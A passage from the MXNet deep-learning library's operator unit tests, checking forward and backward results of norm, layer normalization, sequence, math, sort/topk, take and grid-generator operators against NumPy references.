enforce_safe_acc = "0" if "MXNET_SAFE_ACCUMULATION" not in os.environ else os.environ["MXNET_SAFE_ACCUMULATION"]
else:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order is 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order is 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
def test_layer_norm():
for enforce_safe_acc in ["1", "0"]:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for dtype, forward_check_eps, backward_check_eps in zip([np.float16, np.float32, np.float64],
[1E-2, 1E-3, 1E-4],
[1E-2, 1E-3, 1E-4]):
if dtype != np.float16:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]
else:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10)], [True, True] # large input + fp16 does not pass the forward check
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@with_seed()
@unittest.skip("Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
@with_seed()
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
@with_seed()
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test.bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
arr_grad1 = arr_grad1.asnumpy()
arr_grad2 = arr_grad2.asnumpy()
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
arr_grad = arr_grad.asnumpy()
# print(name)
# print(arr_grad)
# print(npout_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
@with_seed()
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
# Test monitor on symbol using clip
def simple_callback(name, arr):
pass
exe = test.simple_bind(ctx=mx.current_context(), data=shape)
exe.set_monitor_callback(simple_callback, monitor_all=True)
exe.forward(is_train=True)
exe.backward(out_grads=mx.nd.ones(shape))
mx.nd.waitall()
@with_seed()
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x.bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0].asnumpy(), np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out.asnumpy())
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s.bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0].asnumpy(), np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
@with_seed()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
@with_seed()
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b.simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0].asnumpy(), a_npy)
exe.backward() # No error if BlockGrad works
@with_seed()
def test_take():
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
def check_output_n_grad(data_shape, idx_shape, axis, mode, out_of_range=True):
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result.simple_bind(default_context(), a=data_shape,
indices=idx_shape, axis=axis, mode=mode)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0].asnumpy(), np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'].asnumpy(), grad_in)
def check_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad.asnumpy())
for mode in ['clip', 'wrap', 'raise']:
for data_ndim in range(1, 5):
for idx_ndim in range(1, 4):
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
if mode == 'raise':
check_output_n_grad(data_shape, idx_shape, axis, 'raise', False)
check_output_n_grad(data_shape, idx_shape, axis, mode)
check_autograd_req()
@with_seed()
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'].asnumpy(), grad_est, rtol=1e-3, atol=1e-5)
# check addto
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'].asnumpy(), grad_est + grid_grad_npy, rtol=1e-2, atol=1e-5)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
